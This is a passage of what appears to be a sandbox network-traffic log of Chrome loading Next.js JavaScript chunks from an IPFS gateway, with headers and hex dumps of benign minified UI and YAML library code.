                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:54 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 5383
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreigqcxceifozam4kqw73apyu3sl5um4yb2c5yj7n772g2r56udct4y"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/9072-51cf922cfdeaf6b4.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreigqcxceifozam4kqw73apyu3sl5um4yb2c5yj7n772g2r56udct4y
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 209550
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 36 33 66 65 38 32 34 32 63 65 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e463fe8242ce-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1306INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 30 37 32 5d 2c 7b 37 39 30 37 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 29 7b 74 2e 64 28 6e 2c 7b 5a 50 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4e 7d 7d 29 3b 76 61 72 20 72 3d 74 28 36 33 33 36 36 29 2c 69 3d 74 28 38 37 34 36 32 29 2c 6f 3d 74 28 36 37 32 39 34 29 2c 61 3d 74 28 38 36 30 31 30 29 2c 73 3d 74 28 39 35 34 30 38 29 2c 63 3d 74 28 33 39 37 30 37 29 2c 70 3d 74 28 39 34 37 38 30 29 2c 75 3d 74 28 38 31 37 31 39 29 2c 6c 3d 74 28 37 38 38 38 34 29 2c 6d 3d 74 28 36 32 30 39 37 29 3b 76 61 72 20 64 3d 6f 2e 63
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9072],{79072:function(e,n,t){t.d(n,{ZP:function(){return N}});var r=t(63366),i=t(87462),o=t(67294),a=t(86010),s=t(95408),c=t(39707),p=t(94780),u=t(81719),l=t(78884),m=t(62097);var d=o.c
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 7b 63 6f 6e 74 61 69 6e 65 72 3a 72 2c 64 69 72 65 63 74 69 6f 6e 3a 69 2c 69 74 65 6d 3a 6f 2c 73 70 61 63 69 6e 67 3a 61 2c 77 72 61 70 3a 73 2c 7a 65 72 6f 4d 69 6e 57 69 64 74 68 3a 63 2c 62 72 65 61 6b 70 6f 69 6e 74 73 3a 70 7d 3d 74 3b 6c 65 74 20 75 3d 5b 5d 3b 72 26 26 28 75 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 3d 7b 7d 29 7b 69 66 28 21 65 7c 7c 65 3c 3d 30 29 72 65 74 75 72 6e 5b 5d 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 65 26 26 21 4e 75 6d 62 65 72 2e 69 73 4e 61 4e 28 4e 75 6d 62 65 72 28 65 29 29 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 5b 74 5b 60 73 70 61 63 69 6e 67 2d 78 73 2d 24 7b 53 74 72 69 6e 67 28 65 29 7d 60 5d 5d 3b 63 6f 6e 73 74 20 72 3d 5b 5d 3b 72
                                                                                                                                                                                                                                                  Data Ascii: {container:r,direction:i,item:o,spacing:a,wrap:s,zeroMinWidth:c,breakpoints:p}=t;let u=[];r&&(u=function(e,n,t={}){if(!e||e<=0)return[];if("string"===typeof e&&!Number.isNaN(Number(e))||"number"===typeof e)return[t[`spacing-xs-${String(e)}`]];const r=[];r
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 7d 60 5d 3a 7b 70 61 64 64 69 6e 67 54 6f 70 3a 24 28 6f 29 7d 7d 3a 6e 75 6c 6c 21 3d 28 69 3d 74 29 26 26 69 2e 69 6e 63 6c 75 64 65 73 28 72 29 3f 7b 7d 3a 7b 6d 61 72 67 69 6e 54 6f 70 3a 30 2c 5b 60 26 20 3e 20 2e 24 7b 68 2e 69 74 65 6d 7d 60 5d 3a 7b 70 61 64 64 69 6e 67 54 6f 70 3a 30 7d 7d 7d 29 29 7d 72 65 74 75 72 6e 20 69 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 7b 74 68 65 6d 65 3a 65 2c 6f 77 6e 65 72 53 74 61 74 65 3a 6e 7d 29 7b 63 6f 6e 73 74 7b 63 6f 6e 74 61 69 6e 65 72 3a 74 2c 63 6f 6c 75 6d 6e 53 70 61 63 69 6e 67 3a 72 7d 3d 6e 3b 6c 65 74 20 69 3d 7b 7d 3b 69 66 28 74 26 26 30 21 3d 3d 72 29 7b 63 6f 6e 73 74 20 6e 3d 28 30 2c 73 2e 50 24 29 28 7b 76 61 6c 75 65 73 3a 72 2c 62 72 65 61 6b 70 6f 69 6e 74 73 3a 65 2e 62 72 65 61 6b 70
                                                                                                                                                                                                                                                  Data Ascii: }`]:{paddingTop:$(o)}}:null!=(i=t)&&i.includes(r)?{}:{marginTop:0,[`& > .${h.item}`]:{paddingTop:0}}}))}return i}),(function({theme:e,ownerState:n}){const{container:t,columnSpacing:r}=n;let i={};if(t&&0!==r){const n=(0,s.P$)({values:r,breakpoints:e.breakp
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1339INData Raw: 3d 65 3d 3e 7b 63 6f 6e 73 74 7b 63 6c 61 73 73 65 73 3a 6e 2c 63 6f 6e 74 61 69 6e 65 72 3a 74 2c 64 69 72 65 63 74 69 6f 6e 3a 72 2c 69 74 65 6d 3a 69 2c 73 70 61 63 69 6e 67 3a 6f 2c 77 72 61 70 3a 61 2c 7a 65 72 6f 4d 69 6e 57 69 64 74 68 3a 73 2c 62 72 65 61 6b 70 6f 69 6e 74 73 3a 63 7d 3d 65 3b 6c 65 74 20 75 3d 5b 5d 3b 74 26 26 28 75 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 66 28 21 65 7c 7c 65 3c 3d 30 29 72 65 74 75 72 6e 5b 5d 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 65 26 26 21 4e 75 6d 62 65 72 2e 69 73 4e 61 4e 28 4e 75 6d 62 65 72 28 65 29 29 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 5b 60 73 70 61 63 69 6e 67 2d 78 73 2d 24 7b 53 74 72 69 6e 67 28 65 29 7d 60 5d 3b
                                                                                                                                                                                                                                                  Data Ascii: =e=>{const{classes:n,container:t,direction:r,item:i,spacing:o,wrap:a,zeroMinWidth:s,breakpoints:c}=e;let u=[];t&&(u=function(e,n){if(!e||e<=0)return[];if("string"===typeof e&&!Number.isNaN(Number(e))||"number"===typeof e)return[`spacing-xs-${String(e)}`];


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  113192.168.2.549835209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC750OUTGET /_next/static/chunks/2284-c8e8c4a9494b7235.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/governance/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:54 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 50864
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreihlmvtgs4jqi5a6ww7cju7qugihdszpnnvj2svy4awf7wrzpms3qu"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/2284-c8e8c4a9494b7235.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreihlmvtgs4jqi5a6ww7cju7qugihdszpnnvj2svy4awf7wrzpms3qu
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-08
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 7464282
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 36 33 66 63 34 65 34 32 64 38 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e463fc4e42d8-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 32 38 34 5d 2c 7b 33 36 39 31 39 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 6e 28 35 31 38 33 33 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 65 29 6f 28 65 2c 6e 29 26 26 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 74 2c 65 29 7d 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 28 74
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2284],{36919:function(t,e,n){"use strict";var r=n(51833);function i(t,e){for(var n in e)o(e,n)&&(t[n]=e[n])}function o(t,e){return Object.prototype.hasOwnProperty.call(t,e)}t.exports=function(t){r(t
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 65 6f 66 20 6e 2e 73 65 63 74 69 6f 6e 29 26 26 69 28 74 2c 6e 2e 73 65 63 74 69 6f 6e 29 3b 72 65 74 75 72 6e 20 74 7d 28 6e 2c 65 29 7d 66 2e 65 6e 67 69 6e 65 73 3d 63 2c 66 2e 73 74 72 69 6e 67 69 66 79 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 28 74 2c 6e 29 29 2c 61 28 74 2c 65 2c 6e 29 7d 2c 66 2e 72 65 61 64 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 63 6f 6e 73 74 20 6e 3d 66 28 72 2e 72 65 61 64 46 69 6c 65 53 79 6e 63 28 74 2c 22 75 74 66 38 22 29 2c 65 29 3b 72 65 74 75 72 6e 20 6e 2e 70 61 74 68 3d 74 2c 6e 7d 2c 66 2e 74 65 73 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 70 2e 73 74 61 72 74 73 57 69 74 68 28 74 2c
                                                                                                                                                                                                                                                  Data Ascii: eof n.section)&&i(t,n.section);return t}(n,e)}f.engines=c,f.stringify=function(t,e,n){return"string"===typeof t&&(t=f(t,n)),a(t,e,n)},f.read=function(t,e){const n=f(r.readFileSync(t,"utf8"),e);return n.path=t,n},f.test=function(t,e){return p.startsWith(t,
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 73 3d 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3b 65 6e 67 69 6e 65 73 2e 79 61 6d 6c 3d 7b 70 61 72 73 65 3a 79 61 6d 6c 2e 73 61 66 65 4c 6f 61 64 2e 62 69 6e 64 28 79 61 6d 6c 29 2c 73 74 72 69 6e 67 69 66 79 3a 79 61 6d 6c 2e 73 61 66 65 44 75 6d 70 2e 62 69 6e 64 28 79 61 6d 6c 29 7d 2c 65 6e 67 69 6e 65 73 2e 6a 73 6f 6e 3d 7b 70 61 72 73 65 3a 4a 53 4f 4e 2e 70 61 72 73 65 2e 62 69 6e 64 28 4a 53 4f 4e 29 2c 73 74 72 69 6e 67 69 66 79 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 63 6f 6e 73 74 20 6e 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 72 65 70 6c 61 63 65 72 3a 6e 75 6c 6c 2c 73 70 61 63 65 3a 32 7d 2c 65 29 3b 72 65 74 75 72 6e 20 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 2c 6e 2e 72 65 70 6c 61 63 65 72 2c 6e 2e 73 70 61 63 65
                                                                                                                                                                                                                                                  Data Ascii: s=module.exports;engines.yaml={parse:yaml.safeLoad.bind(yaml),stringify:yaml.safeDump.bind(yaml)},engines.json={parse:JSON.parse.bind(JSON),stringify:function(t,e){const n=Object.assign({replacer:null,space:2},e);return JSON.stringify(t,n.replacer,n.space
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 65 28 2d 31 29 3f 74 2b 22 5c 6e 22 3a 74 7d 74 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 69 66 28 6e 75 6c 6c 3d 3d 65 26 26 6e 75 6c 6c 3d 3d 6e 29 73 77 69 74 63 68 28 72 28 74 29 29 7b 63 61 73 65 22 6f 62 6a 65 63 74 22 3a 65 3d 74 2e 64 61 74 61 2c 6e 3d 7b 7d 3b 62 72 65 61 6b 3b 63 61 73 65 22 73 74 72 69 6e 67 22 3a 72 65 74 75 72 6e 20 74 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 65 78 70 65 63 74 65 64 20 66 69 6c 65 20 74 6f 20 62 65 20 61 20 73 74 72 69 6e 67 20 6f 72 20 6f 62 6a 65 63 74 22 29 7d 63 6f 6e 73 74 20 73 3d 74 2e 63 6f 6e 74 65 6e 74 2c 63 3d 6f 28 6e 29 3b 69 66 28 6e 75 6c 6c 3d 3d 65 29 7b 69 66 28 21 63 2e 64 61 74 61 29 72 65 74 75 72 6e 20 74
                                                                                                                                                                                                                                                  Data Ascii: e(-1)?t+"\n":t}t.exports=function(t,e,n){if(null==e&&null==n)switch(r(t)){case"object":e=t.data,n={};break;case"string":return t;default:throw new TypeError("expected file to be a string or object")}const s=t.content,c=o(n);if(null==e){if(!c.data)return t
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 6e 22 62 75 66 66 65 72 22 3d 3d 3d 6f 28 74 29 7d 2c 65 2e 69 73 4f 62 6a 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 6f 62 6a 65 63 74 22 3d 3d 3d 6f 28 74 29 7d 2c 65 2e 74 6f 42 75 66 66 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 3d 74 79 70 65 6f 66 20 74 3f 72 2e 66 72 6f 6d 28 74 29 3a 74 7d 2c 65 2e 74 6f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 65 2e 69 73 42 75 66 66 65 72 28 74 29 29 72 65 74 75 72 6e 20 69 28 53 74 72 69 6e 67 28 74 29 29 3b 69 66 28 22 73 74 72 69 6e 67 22 21 3d 3d 74 79 70 65 6f 66 20 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 65 78 70 65 63 74 65 64 20 69 6e 70 75 74 20 74 6f 20 62 65 20 61 20 73 74
                                                                                                                                                                                                                                                  Data Ascii: n"buffer"===o(t)},e.isObject=function(t){return"object"===o(t)},e.toBuffer=function(t){return"string"===typeof t?r.from(t):t},e.toString=function(t){if(e.isBuffer(t))return i(String(t));if("string"!==typeof t)throw new TypeError("expected input to be a st
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 22 29 2c 74 2e 65 78 70 6f 72 74 73 2e 63 6f 6d 70 6f 73 65 3d 6f 28 22 63 6f 6d 70 6f 73 65 22 29 2c 74 2e 65 78 70 6f 72 74 73 2e 61 64 64 43 6f 6e 73 74 72 75 63 74 6f 72 3d 6f 28 22 61 64 64 43 6f 6e 73 74 72 75 63 74 6f 72 22 29 7d 2c 32 35 35 39 36 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 74 79 70 65 6f 66 20 74 7c 7c 6e 75 6c 6c 3d 3d 3d 74 7d 74 2e 65 78 70 6f 72 74 73 2e 69 73 4e 6f 74 68 69 6e 67 3d 65 2c 74 2e 65 78 70 6f 72 74 73 2e 69 73 4f 62 6a 65 63 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 74 26 26 6e 75 6c 6c 21 3d 3d 74 7d 2c 74
                                                                                                                                                                                                                                                  Data Ascii: "),t.exports.compose=o("compose"),t.exports.addConstructor=o("addConstructor")},25596:function(t){"use strict";function e(t){return"undefined"===typeof t||null===t}t.exports.isNothing=e,t.exports.isObject=function(t){return"object"===typeof t&&null!==t},t
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 7c 21 31 2c 74 68 69 73 2e 66 6c 6f 77 4c 65 76 65 6c 3d 72 2e 69 73 4e 6f 74 68 69 6e 67 28 74 2e 66 6c 6f 77 4c 65 76 65 6c 29 3f 2d 31 3a 74 2e 66 6c 6f 77 4c 65 76 65 6c 2c 74 68 69 73 2e 73 74 79 6c 65 4d 61 70 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 2c 61 2c 73 2c 75 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 65 29 72 65 74 75 72 6e 7b 7d 3b 66 6f 72 28 6e 3d 7b 7d 2c 69 3d 30 2c 6f 3d 28 72 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 29 2e 6c 65 6e 67 74 68 3b 69 3c 6f 3b 69 2b 3d 31 29 61 3d 72 5b 69 5d 2c 73 3d 53 74 72 69 6e 67 28 65 5b 61 5d 29 2c 22 21 21 22 3d 3d 3d 61 2e 73 6c 69 63 65 28 30 2c 32 29 26 26 28 61 3d 22 74 61 67 3a 79 61 6d 6c 2e 6f 72 67 2c 32 30 30 32 3a 22 2b 61 2e 73 6c 69 63 65 28 32 29 29 2c
                                                                                                                                                                                                                                                  Data Ascii: |!1,this.flowLevel=r.isNothing(t.flowLevel)?-1:t.flowLevel,this.styleMap=function(t,e){var n,r,i,o,a,s,u;if(null===e)return{};for(n={},i=0,o=(r=Object.keys(e)).length;i<o;i+=1)a=r[i],s=String(e[a]),"!!"===a.slice(0,2)&&(a="tag:yaml.org,2002:"+a.slice(2)),
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 64 3d 6d 28 63 3d 74 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 29 26 26 36 35 32 37 39 21 3d 3d 63 26 26 21 67 28 63 29 26 26 34 35 21 3d 3d 63 26 26 36 33 21 3d 3d 63 26 26 35 38 21 3d 3d 63 26 26 34 34 21 3d 3d 63 26 26 39 31 21 3d 3d 63 26 26 39 33 21 3d 3d 63 26 26 31 32 33 21 3d 3d 63 26 26 31 32 35 21 3d 3d 63 26 26 33 35 21 3d 3d 63 26 26 33 38 21 3d 3d 63 26 26 34 32 21 3d 3d 63 26 26 33 33 21 3d 3d 63 26 26 31 32 34 21 3d 3d 63 26 26 36 31 21 3d 3d 63 26 26 36 32 21 3d 3d 63 26 26 33 39 21 3d 3d 63 26 26 33 34 21 3d 3d 63 26 26 33 37 21 3d 3d 63 26 26 36 34 21 3d 3d 63 26 26 39 36 21 3d 3d 63 26 26 21 67 28 74 2e 63 68 61 72 43 6f 64 65 41 74 28 74 2e 6c 65 6e 67 74 68 2d 31 29 29 3b 69 66 28 65 29 66 6f 72 28 6f 3d 30 3b 6f 3c 74 2e 6c 65 6e 67
                                                                                                                                                                                                                                                  Data Ascii: d=m(c=t.charCodeAt(0))&&65279!==c&&!g(c)&&45!==c&&63!==c&&58!==c&&44!==c&&91!==c&&93!==c&&123!==c&&125!==c&&35!==c&&38!==c&&42!==c&&33!==c&&124!==c&&61!==c&&62!==c&&39!==c&&34!==c&&37!==c&&64!==c&&96!==c&&!g(t.charCodeAt(t.length-1));if(e)for(o=0;o<t.leng
                                                                                                                                                                                                                                                  2024-09-28 04:11:54 UTC1369INData Raw: 6e 22 29 2b 6b 28 63 2c 65 29 2c 61 3d 6e 7d 72 65 74 75 72 6e 20 6f 7d 28 65 2c 61 29 2c 6f 29 29 3b 63 61 73 65 20 35 3a 72 65 74 75 72 6e 27 22 27 2b 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 2c 6e 2c 72 2c 69 3d 22 22 2c 6f 3d 30 3b 6f 3c 74 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 28 65 3d 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 29 3e 3d 35 35 32 39 36 26 26 65 3c 3d 35 36 33 31 39 26 26 28 6e 3d 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2b 31 29 29 3e 3d 35 36 33 32 30 26 26 6e 3c 3d 35 37 33 34 33 3f 28 69 2b 3d 70 28 31 30 32 34 2a 28 65 2d 35 35 32 39 36 29 2b 6e 2d 35 36 33 32 30 2b 36 35 35 33 36 29 2c 6f 2b 2b 29 3a 69 2b 3d 21 28 72 3d 75 5b 65 5d 29 26 26 6d 28 65 29 3f 74 5b 6f 5d 3a 72 7c 7c 70 28 65 29 3b 72 65 74 75
                                                                                                                                                                                                                                                  Data Ascii: n")+k(c,e),a=n}return o}(e,a),o));case 5:return'"'+function(t){for(var e,n,r,i="",o=0;o<t.length;o++)(e=t.charCodeAt(o))>=55296&&e<=56319&&(n=t.charCodeAt(o+1))>=56320&&n<=57343?(i+=p(1024*(e-55296)+n-56320+65536),o++):i+=!(r=u[e])&&m(e)?t[o]:r||p(e);retu


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  114192.168.2.549839209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:55 UTC750OUTGET /_next/static/chunks/7091-73091706560db88e.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
